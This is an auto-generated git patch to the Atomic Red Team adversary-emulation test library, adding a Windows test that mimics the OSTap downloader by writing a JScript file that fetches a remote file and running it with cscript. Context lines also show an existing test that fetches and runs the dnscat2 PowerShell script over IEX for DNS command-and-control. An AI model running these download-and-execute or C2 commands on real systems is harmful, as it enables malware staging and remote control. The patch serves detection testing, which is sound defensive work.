From ab2c18b19df19b8fb4bde2b570fdc832216d15fc Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Sat, 29 Feb 2020 21:59:49 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1071/T1071.md   | 35 +++++++++++++++++++++++++++++++++++
 atomics/index.md         |  1 +
 atomics/index.yaml       | 28 +++++++++++++++++++++++++++-
 atomics/windows-index.md |  1 +
 4 files changed, 64 insertions(+), 1 deletion(-)

diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index 68db267a..ff74708f 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -20,6 +20,8 @@ For connections that occur internally within an enclave (such as those between a
 
 - [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
 
+- [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download)
+
 
 <br/>
 
@@ -227,4 +229,37 @@ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - OSTap Payload Download
+Uses cscript //E:jscript to download a file
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
+| file_url | URL to retrieve file from | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt|
+| out_file | File to download payload to | Path | T1071-Out.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+```
+echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+cscript //E:Jscript #{script_file}
+```
+
+#### Cleanup Commands:
+```
+del #{script_file} /F /Q
+del #{out_file} /F /Q
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/index.md b/atomics/index.md
index 983670ff..91d7161a 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -977,6 +977,7 @@
   - Atomic Test #5: DNS Regular Beaconing [windows]
   - Atomic Test #6: DNS Long Domain Query [windows]
   - Atomic Test #7: DNS C2 [windows]
+  - Atomic Test #8: OSTap Payload Download [windows]
 - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
   - Atomic Test #1: OpenSSL C2 [windows]
 - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index e94a31bc..d6b31bba 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -27868,9 +27868,35 @@ command-and-control:
       executor:
         name: powershell
         elevation_required: false
-        command: |-
+        command: |
           IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
           Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
+    - name: OSTap Payload Download
+      description: 'Uses cscript //E:jscript to download a file
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        script_file:
+          description: File to execute jscript code from
+          type: Path
+          default: "%TEMP%\\OSTapGet.js"
+        file_url:
+          description: URL to retrieve file from
+          type: Url
+          default: https://www.w3.org/TR/PNG/iso_8859-1.txt
+        out_file:
+          description: File to download payload to
+          type: Path
+          default: T1071-Out.txt
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+          cscript //E:Jscript #{script_file}
+        cleanup_command: "del #{script_file} /F /Q\ndel #{out_file} /F /Q "
   T1032:
     technique:
       x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 445bbb0e..c5dd61b2 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -724,6 +724,7 @@
   - Atomic Test #5: DNS Regular Beaconing [windows]
   - Atomic Test #6: DNS Long Domain Query [windows]
   - Atomic Test #7: DNS C2 [windows]
+  - Atomic Test #8: OSTap Payload Download [windows]
 - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
   - Atomic Test #1: OpenSSL C2 [windows]
 - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)